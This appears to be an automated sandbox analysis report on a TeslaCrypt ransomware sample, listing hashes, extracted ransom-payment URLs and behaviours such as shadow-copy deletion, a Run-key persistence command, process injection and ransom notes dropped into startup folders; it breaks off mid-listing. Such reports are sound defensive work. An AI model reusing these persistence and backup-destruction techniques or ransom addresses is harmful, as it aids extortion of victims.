Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21/01/2025, 08:42 UTC
Static task
static1
Behavioral task
behavioral1
Sample
e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe
Resource
win10v2004-20241007-en
General
-
Target
e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe
-
Size
371KB
-
MD5
c192a273a786b569df2056914faf8327
-
SHA1
87f24f470d678deae2cade1d3fd12255e796c091
-
SHA256
e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced
-
SHA512
8e036f23c66fbd545fd03aba423a47bf422cee52204fc3a2fb2682fd00a31c2f3e6dc982d01fa30ab2f8ba0b3463a763e403b212f00fe9488b2791dd03629427
-
SSDEEP
6144:QtttRvGxiRcePUSrcTQ+Yd6v6AlYhZ+ddp5GuZEE86Yrp0eWIxQO6kUUecBlzJbu:EttRveivPrcqd26A+hcdp5GYEE8D3WIe
Malware Config
Extracted
C:\Program Files\7-Zip\Lang\_RECoVERY_+hrehg.txt
teslacrypt
http://yyre45dbvn2nhbefbmh.begumvelic.at/C0716909F59A9C3
http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/C0716909F59A9C3
http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/C0716909F59A9C3
http://xlowfznrg4wf7dli.ONION/C0716909F59A9C3
Signatures
-
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
-
Teslacrypt family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (876) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cdxnmauxndwm.exe -
Drops startup file 6 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_RECoVERY_+hrehg.html cdxnmauxndwm.exe -
Executes dropped EXE 2 IoCs
pid Process 3172 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fmtutyxfcqid = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\cdxnmauxndwm.exe\"" cdxnmauxndwm.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1132 set thread context of 1312 1132 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 98 PID 3172 set thread context of 5008 3172 cdxnmauxndwm.exe 104 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Dark\Paint3D.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\Classic\Spider.Medium.png cdxnmauxndwm.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\150.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SmallTile.scale-150_contrast-white.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-125.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-16.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\meBoot.min.js cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\Assets\OfflinePages\Scripts\Me\MeControl\offline\webviewBoot.min.js cdxnmauxndwm.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.scale-100_contrast-white.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\Assets\OfflinePages\Scripts\Me\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\MicrosoftLogo.scale-200.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\MoviesAnywhereLogoWithTextDark.scale-125.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\snooze.contrast-white.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-40_contrast-white.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Square44x44\PaintAppList.targetsize-16.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-24_contrast-white.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-400_contrast-white.png cdxnmauxndwm.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-16_altform-lightunplated.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-white\LargeTile.scale-100.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\manifests\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\microsoft-logo-white.png cdxnmauxndwm.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-MX\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\5.jpg cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\LargeTile.scale-125_contrast-black.png cdxnmauxndwm.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-100.png cdxnmauxndwm.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\et.pak cdxnmauxndwm.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailBadge.scale-100.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailMediumTile.scale-125.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Diagnostics\Simple\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\lv-LV\View3d\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Resources\RetailDemo\strings\en-us\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\LargeTile.scale-200.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_neutral_split.scale-100_8wekyb3d8bbwe\images\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PeopleLargeTile.scale-125.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\FileAssociation\FileAssociation.targetsize-256.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-GoogleCloudCacheMini.scale-150.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailLargeTile.scale-150.png cdxnmauxndwm.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\Presentation Designs\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\_RECoVERY_+hrehg.html cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-48_contrast-white.png cdxnmauxndwm.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxSmallTile.scale-200.png cdxnmauxndwm.exe File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT\_RECoVERY_+hrehg.png cdxnmauxndwm.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\it-IT\_RECoVERY_+hrehg.txt cdxnmauxndwm.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\cdxnmauxndwm.exe e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe File opened for modification C:\Windows\cdxnmauxndwm.exe e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cdxnmauxndwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTEPAD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cdxnmauxndwm.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cdxnmauxndwm.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4360 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe 5008 cdxnmauxndwm.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 3796 msedge.exe 3796 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1312 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe Token: SeDebugPrivilege 5008 cdxnmauxndwm.exe Token: SeIncreaseQuotaPrivilege 3712 WMIC.exe Token: SeSecurityPrivilege 3712 WMIC.exe Token: SeTakeOwnershipPrivilege 3712 WMIC.exe Token: SeLoadDriverPrivilege 3712 WMIC.exe Token: SeSystemProfilePrivilege 3712 WMIC.exe Token: SeSystemtimePrivilege 3712 WMIC.exe Token: SeProfSingleProcessPrivilege 3712 WMIC.exe Token: SeIncBasePriorityPrivilege 3712 WMIC.exe Token: SeCreatePagefilePrivilege 3712 WMIC.exe Token: SeBackupPrivilege 3712 WMIC.exe Token: SeRestorePrivilege 3712 WMIC.exe Token: SeShutdownPrivilege 3712 WMIC.exe Token: SeDebugPrivilege 3712 WMIC.exe Token: SeSystemEnvironmentPrivilege 3712 WMIC.exe Token: SeRemoteShutdownPrivilege 3712 WMIC.exe Token: SeUndockPrivilege 3712 WMIC.exe Token: SeManageVolumePrivilege 3712 WMIC.exe Token: 33 3712 WMIC.exe Token: 34 3712 WMIC.exe Token: 35 3712 WMIC.exe Token: 36 3712 WMIC.exe Token: SeIncreaseQuotaPrivilege 3712 WMIC.exe Token: SeSecurityPrivilege 3712 WMIC.exe Token: SeTakeOwnershipPrivilege 3712 WMIC.exe Token: SeLoadDriverPrivilege 3712 WMIC.exe Token: SeSystemProfilePrivilege 3712 WMIC.exe Token: SeSystemtimePrivilege 3712 WMIC.exe Token: SeProfSingleProcessPrivilege 3712 WMIC.exe Token: SeIncBasePriorityPrivilege 3712 WMIC.exe Token: SeCreatePagefilePrivilege 3712 WMIC.exe Token: SeBackupPrivilege 3712 WMIC.exe Token: SeRestorePrivilege 3712 WMIC.exe Token: SeShutdownPrivilege 3712 WMIC.exe Token: SeDebugPrivilege 3712 WMIC.exe Token: SeSystemEnvironmentPrivilege 3712 WMIC.exe Token: SeRemoteShutdownPrivilege 3712 WMIC.exe Token: SeUndockPrivilege 3712 WMIC.exe Token: SeManageVolumePrivilege 3712 WMIC.exe Token: 33 3712 WMIC.exe Token: 34 3712 WMIC.exe Token: 35 3712 WMIC.exe Token: 36 3712 WMIC.exe Token: SeBackupPrivilege 2112 vssvc.exe Token: SeRestorePrivilege 2112 vssvc.exe Token: SeAuditPrivilege 2112 vssvc.exe Token: SeIncreaseQuotaPrivilege 748 WMIC.exe Token: SeSecurityPrivilege 748 WMIC.exe Token: SeTakeOwnershipPrivilege 748 WMIC.exe Token: SeLoadDriverPrivilege 748 WMIC.exe Token: SeSystemProfilePrivilege 748 WMIC.exe Token: SeSystemtimePrivilege 748 WMIC.exe Token: SeProfSingleProcessPrivilege 748 WMIC.exe Token: SeIncBasePriorityPrivilege 748 WMIC.exe Token: SeCreatePagefilePrivilege 748 WMIC.exe Token: SeBackupPrivilege 748 WMIC.exe Token: SeRestorePrivilege 748 WMIC.exe Token: SeShutdownPrivilege 748 WMIC.exe Token: SeDebugPrivilege 748 WMIC.exe Token: SeSystemEnvironmentPrivilege 748 WMIC.exe Token: SeRemoteShutdownPrivilege 748 WMIC.exe Token: SeUndockPrivilege 748 WMIC.exe Token: SeManageVolumePrivilege 748 WMIC.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe 3796 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1132 wrote to memory of 1312 1132 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 98 PID 1132 wrote to memory of 1312 1132 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 98 PID 1132 wrote to memory of 1312 1132 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 98 PID 1132 wrote to memory of 1312 1132 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 98 PID 1132 wrote to memory of 1312 1132 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 98 PID 1132 wrote to memory of 1312 1132 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 98 PID 1132 wrote to memory of 1312 1132 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 98 PID 1132 wrote to memory of 1312 1132 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 98 PID 1132 wrote to memory of 1312 1132 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 98 PID 1312 wrote to memory of 3172 1312 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 99 PID 1312 wrote to memory of 3172 1312 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 99 PID 1312 wrote to memory of 3172 1312 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 99 PID 1312 wrote to memory of 4432 1312 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 100 PID 1312 wrote to memory of 4432 1312 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 100 PID 1312 wrote to memory of 4432 1312 e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe 100 PID 3172 wrote to memory of 5008 3172 cdxnmauxndwm.exe 104 PID 3172 wrote to memory of 5008 3172 cdxnmauxndwm.exe 104 PID 3172 wrote to memory of 5008 3172 cdxnmauxndwm.exe 104 PID 3172 wrote to memory of 5008 3172 cdxnmauxndwm.exe 104 PID 3172 wrote to memory of 5008 3172 cdxnmauxndwm.exe 104 PID 3172 wrote to memory of 5008 3172 cdxnmauxndwm.exe 104 PID 3172 wrote to memory of 5008 3172 cdxnmauxndwm.exe 104 PID 3172 wrote to memory of 5008 3172 cdxnmauxndwm.exe 104 PID 3172 wrote to memory of 5008 3172 cdxnmauxndwm.exe 104 PID 5008 wrote to memory of 3712 5008 cdxnmauxndwm.exe 105 PID 5008 wrote to memory of 3712 5008 cdxnmauxndwm.exe 105 PID 5008 wrote to memory of 4360 5008 cdxnmauxndwm.exe 111 PID 5008 wrote to memory of 4360 5008 cdxnmauxndwm.exe 111 PID 5008 wrote to memory of 4360 5008 cdxnmauxndwm.exe 111 PID 5008 wrote to memory of 3796 5008 cdxnmauxndwm.exe 112 PID 5008 wrote to memory of 3796 5008 cdxnmauxndwm.exe 112 PID 3796 wrote to memory of 3632 3796 msedge.exe 113 PID 3796 wrote to memory of 3632 3796 msedge.exe 113 PID 5008 wrote to memory of 748 5008 cdxnmauxndwm.exe 114 PID 5008 wrote to memory of 748 5008 cdxnmauxndwm.exe 114 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 wrote to memory of 3652 3796 msedge.exe 116 PID 3796 